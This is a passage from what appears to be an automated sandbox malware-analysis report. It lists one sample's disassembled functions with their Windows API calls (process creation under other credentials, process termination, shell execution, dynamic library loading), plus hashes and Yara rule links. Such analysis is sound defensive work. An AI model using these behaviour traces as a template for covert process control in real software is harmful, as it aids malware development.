CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B0154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00B01563

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 8ccf9af51fc2958f50e1fa1abbba18b3a7062eadff2c026fe56306b396f2b5d0
Instruction ID: 062ba48f98698b1e6970369b25e1085fe748ca6221e4aa7d43c8605987076d57
Opcode Fuzzy Hash: 8ccf9af51fc2958f50e1fa1abbba18b3a7062eadff2c026fe56306b396f2b5d0
Instruction Fuzzy Hash: F7114472500209ABDB11CFA8DD49BDE7FA9EB48708F144064FA05A21A0C7718E649B60

Function 00AC3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00AC3379,00AC2FE5), ref: 00AC3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AC339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AC33B7
SetLastError.KERNEL32(00000000,?,00AC3379,00AC2FE5), ref: 00AC3409

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: dc5c6d5caefdcd528137150432eaaff4917ace8cf0c5684b0d8b74db885714cc
Instruction ID: 49c33c85c99fa684014fa417ef24a98491c63c9acd110520660b7265e60143fc
Opcode Fuzzy Hash: dc5c6d5caefdcd528137150432eaaff4917ace8cf0c5684b0d8b74db885714cc
Instruction Fuzzy Hash: EA01D83360D351BEAF152BB47D95F6B2E94EB15379732822DF410862F0EF554D016688

Function 00AD2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00AD5686,00AE3CD6,?,00000000,?,00AD5B6A,?,?,?,?,?,00ACE6D1,?,00B68A48), ref: 00AD2D78
_free.LIBCMT ref: 00AD2DAB
_free.LIBCMT ref: 00AD2DD3
SetLastError.KERNEL32(00000000,?,?,?,?,00ACE6D1,?,00B68A48,00000010,00AA4F4A,?,?,00000000,00AE3CD6), ref: 00AD2DE0
SetLastError.KERNEL32(00000000,?,?,?,?,00ACE6D1,?,00B68A48,00000010,00AA4F4A,?,?,00000000,00AE3CD6), ref: 00AD2DEC
_abort.LIBCMT ref: 00AD2DF2

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 475267bfefeade1e41e22505ef4183352c30c448721f221b58c66fd42227959e
Instruction ID: c54e91e07d85fd802926f749a39a06047081a0f2575a4e33a27810297ed91b6b
Opcode Fuzzy Hash: 475267bfefeade1e41e22505ef4183352c30c448721f221b58c66fd42227959e
Instruction Fuzzy Hash: F1F0A93654460067D71227746D0AB5E39666BF27A1F344417F8A7A33D1EE748901D361

Function 00B38A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00AB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AB9693
Part of subcall function 00AB9639: SelectObject.GDI32(?,00000000), ref: 00AB96A2
Part of subcall function 00AB9639: BeginPath.GDI32(?), ref: 00AB96B9
Part of subcall function 00AB9639: SelectObject.GDI32(?,00000000), ref: 00AB96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00B38A4E
LineTo.GDI32(?,00000003,00000000), ref: 00B38A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00B38A70
LineTo.GDI32(?,00000000,00000003), ref: 00B38A80
EndPath.GDI32(?), ref: 00B38A90
StrokePath.GDI32(?), ref: 00B38AA0

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: a5bb812400ce17985c8499ba01f1a8daf532209704d24b374ba7e080cfd907b8
Instruction ID: 873cf03a549bc195a67fb5b3990a747f52bab3bc1ce7848e2f242fa68114fcdd
Opcode Fuzzy Hash: a5bb812400ce17985c8499ba01f1a8daf532209704d24b374ba7e080cfd907b8
Instruction Fuzzy Hash: 41111B7600014CFFDF129F98DC88EAA7FACEB08350F108052BA19AA1A1CB719D55DFA0

Function 00B051FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B05218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00B05229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B05230
ReleaseDC.USER32(00000000,00000000), ref: 00B05238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B0524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00B05261

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: c58823e0f39782b1732ed2ed2117218cb3c8c7e19fc219584e1700df38a0f295
Instruction ID: 72f6894503cdf0bfd378e1383b8ca2a9914143ea7a4ad117161c6d38e59f0b33
Opcode Fuzzy Hash: c58823e0f39782b1732ed2ed2117218cb3c8c7e19fc219584e1700df38a0f295
Instruction Fuzzy Hash: 0E014F75A00718BBEB109BE59C49A5EBFB8EF48751F144065FA04F7291DA709800CFA0

Function 00AA1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AA1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00AA1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AA1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AA1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00AA1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00AA1C22

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: ab900a3b82fe12a4a4da786696817e433d2923ddcc1ec22fe47ad9fe46c53865
Instruction ID: 01b7055dd971590273a8bee69076f1ac98db2d6d4a9f8f5b7555e5f0cdd218b0
Opcode Fuzzy Hash: ab900a3b82fe12a4a4da786696817e433d2923ddcc1ec22fe47ad9fe46c53865
Instruction Fuzzy Hash: B00167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Function 00B0EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B0EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B0EB46
GetWindowThreadProcessId.USER32(?,?), ref: 00B0EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B0EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B0EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B0EB75

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: ff690e64e100207956251ddf60e405dce1509e784e7e3b2689d96f21a825dec9
Instruction ID: bc247652eecefb6e0e75e4552daf319cb62300950205f90a5d83f8595c85f31f
Opcode Fuzzy Hash: ff690e64e100207956251ddf60e405dce1509e784e7e3b2689d96f21a825dec9
Instruction Fuzzy Hash: B7F01772240558BBE7215BA29C0EEAF3E7CEBCAB11F104158F611F20919BA05A0197B5

Function 00AF7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00AF7452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00AF7469
GetWindowDC.USER32(?), ref: 00AF7475
GetPixel.GDI32(00000000,?,?), ref: 00AF7484
ReleaseDC.USER32(?,00000000), ref: 00AF7496
GetSysColor.USER32(00000005), ref: 00AF74B0

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 1c9314447502f11d8a58b750f1514aebef845fa338663375d1438d3bcc2bd35b
Instruction ID: 99106892b2df201128ecc39567570ee64cb0d2f2a1f5a0725c84a6f8ccc0238b
Opcode Fuzzy Hash: 1c9314447502f11d8a58b750f1514aebef845fa338663375d1438d3bcc2bd35b
Instruction Fuzzy Hash: 88012831400619EFEB515FA8DC0ABAE7FB5FB04312F610164FA15A31A1CF311E51AB50

Function 00B01874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B0187F
UnloadUserProfile.USERENV(?,?), ref: 00B0188B
CloseHandle.KERNEL32(?), ref: 00B01894
CloseHandle.KERNEL32(?), ref: 00B0189C
GetProcessHeap.KERNEL32(00000000,?), ref: 00B018A5
HeapFree.KERNEL32(00000000), ref: 00B018AC

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: a4d43d665ceef6dc321de0ac2c5324937a76a4edca06a3db73139accc879c4f8
Instruction ID: 1c1a78e2f8e0e4f9274b4f074b83ee7d3b92c2728edcc05a29163456f2b6e241
Opcode Fuzzy Hash: a4d43d665ceef6dc321de0ac2c5324937a76a4edca06a3db73139accc879c4f8
Instruction Fuzzy Hash: D4E0C236004501BBDB015BE1ED0C90ABF29FB49B22B208220F225A2070CF329430EB50

Function 00B0C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7620: _wcslen.LIBCMT ref: 00AA7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B0C6EE
_wcslen.LIBCMT ref: 00B0C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B0C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B0C7CA

Strings

0, xrefs: 00B0C6AF

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 4127b78e12a31a5c5ddfe1920071dbd4c171c3b44a76c89a93d73334258e4078
Instruction ID: 2aa2e8bfed0fe14239a31c9c54fe4a1fb840b63ab2c9ba89557199a189c96963
Opcode Fuzzy Hash: 4127b78e12a31a5c5ddfe1920071dbd4c171c3b44a76c89a93d73334258e4078
Instruction Fuzzy Hash: 5251BD716043009BD7259F28C985B6A7FE8EB49310F044BADF9A5E31E1DB60DD048B66

Function 00B2AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00B2AEA3

Part of subcall function 00AA7620: _wcslen.LIBCMT ref: 00AA7625

GetProcessId.KERNEL32(00000000), ref: 00B2AF38
CloseHandle.KERNEL32(00000000), ref: 00B2AF67

Strings

<, xrefs: 00B2AE6B
@, xrefs: 00B2AE72

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: b230ba535a2937c9087d70f58dfd7e4dab091c31f934449ca27f4baabd78d1cb
Instruction ID: a824c268e10c2daea0a5f63f8407f84a15e6813815646ee6a534b90f76acd56e
Opcode Fuzzy Hash: b230ba535a2937c9087d70f58dfd7e4dab091c31f934449ca27f4baabd78d1cb
Instruction Fuzzy Hash: 75718B71A00625DFCB14EF54D584A9EBBF0FF09310F158499E81AAB392CB74ED45CB91

Function 00B0719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B07206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B0723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B0724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B072CF

Strings

DllGetClassObject, xrefs: 00B07242

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 12410d4963a71c42a10fd6dc1108f934139b61227331bc896b3434341b5dee7a
Instruction ID: 2568dca1bdbd48fb0aaf6c728c3350373ccb359885f0d1223a0e2f45551581d0
Opcode Fuzzy Hash: 12410d4963a71c42a10fd6dc1108f934139b61227331bc896b3434341b5dee7a
Instruction Fuzzy Hash: 42416071A44204AFDB15CF54C884A9ABFE9EF45350F2580EDBD059F24ADBB0ED44DBA0

Function 00B33D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B33E35
IsMenu.USER32(?), ref: 00B33E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B33E92
DrawMenuBar.USER32 ref: 00B33EA5

Strings

0, xrefs: 00B33D89

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: cfa02a16076cb1beef0acf9fb8d2367a59fb1c1024c60750409185fd66f5a821
Instruction ID: d387dcb0c1aab7659aec8168301d712567ca7e3a5e61fffab4a08274eb1d3fb7
Opcode Fuzzy Hash: cfa02a16076cb1beef0acf9fb8d2367a59fb1c1024c60750409185fd66f5a821
Instruction Fuzzy Hash: 77414875A00219EFDB10DF94D884EAABBF9FF49750F2441A9E905AB250DB30AE45CF60

Function 00B01DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B01E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B01E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 00B01EA9

Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A

Strings

ComboBox, xrefs: 00B01DF0
ListBox, xrefs: 00B01E25

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: dabb7d2526fc7b3b67f2f6cf17c8e4fdccdc32243ffa04a773bfaef06edea5f0
Instruction ID: 03a4e41b4d4a0cd43d231a07d502955cede380c11378e22f7ce26e4fd66b1539
Opcode Fuzzy Hash: dabb7d2526fc7b3b67f2f6cf17c8e4fdccdc32243ffa04a773bfaef06edea5f0
Instruction Fuzzy Hash: A421B771A00104BFDB189BA4DD46CFFBBF9EF46354F144559F815A71E1DB3849069620

Function 00B32F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B32F8D
LoadLibraryW.KERNEL32(?), ref: 00B32F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B32FA9
DestroyWindow.USER32(?), ref: 00B32FB1

Strings

SysAnimate32, xrefs: 00B32F68

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: e4b9b8b92a29ba704b460f81347ec51939bc7a6f2a7f56fb4014fa0328ae9199
Instruction ID: 591929f70b62befe8ebbc598f65501c2a19042f93c8fe69a01b0efb0dcd453d2
Opcode Fuzzy Hash: e4b9b8b92a29ba704b460f81347ec51939bc7a6f2a7f56fb4014fa0328ae9199
Instruction Fuzzy Hash: 62218C72204205ABEB104FA4DC81EBB77FDEB59364F204658FA50E72A0DB71DC919760

Function 00AC4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AC4D1E,00AD28E9,?,00AC4CBE,00AD28E9,00B688B8,0000000C,00AC4E15,00AD28E9,00000002), ref: 00AC4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AC4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00AC4D1E,00AD28E9,?,00AC4CBE,00AD28E9,00B688B8,0000000C,00AC4E15,00AD28E9,00000002,00000000), ref: 00AC4DC3

Strings

CorExitProcess, xrefs: 00AC4D98
mscoree.dll, xrefs: 00AC4D86

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 022ccf8da6227845dc46c425989fc546c9fb060447dd90414ac2a994d3b659a7
Instruction ID: b696c9dd974dcce193b93b9a819d7a072a1b5bfa7b0e35340d2f714607be7842
Opcode Fuzzy Hash: 022ccf8da6227845dc46c425989fc546c9fb060447dd90414ac2a994d3b659a7
Instruction Fuzzy Hash: 52F03C35A40208BBDB11AB90DC49FAEBFE5EF48751F1101A8E90AB2260CF745E40DB95

Function 00AFD3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00AFD3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00AFD3BF
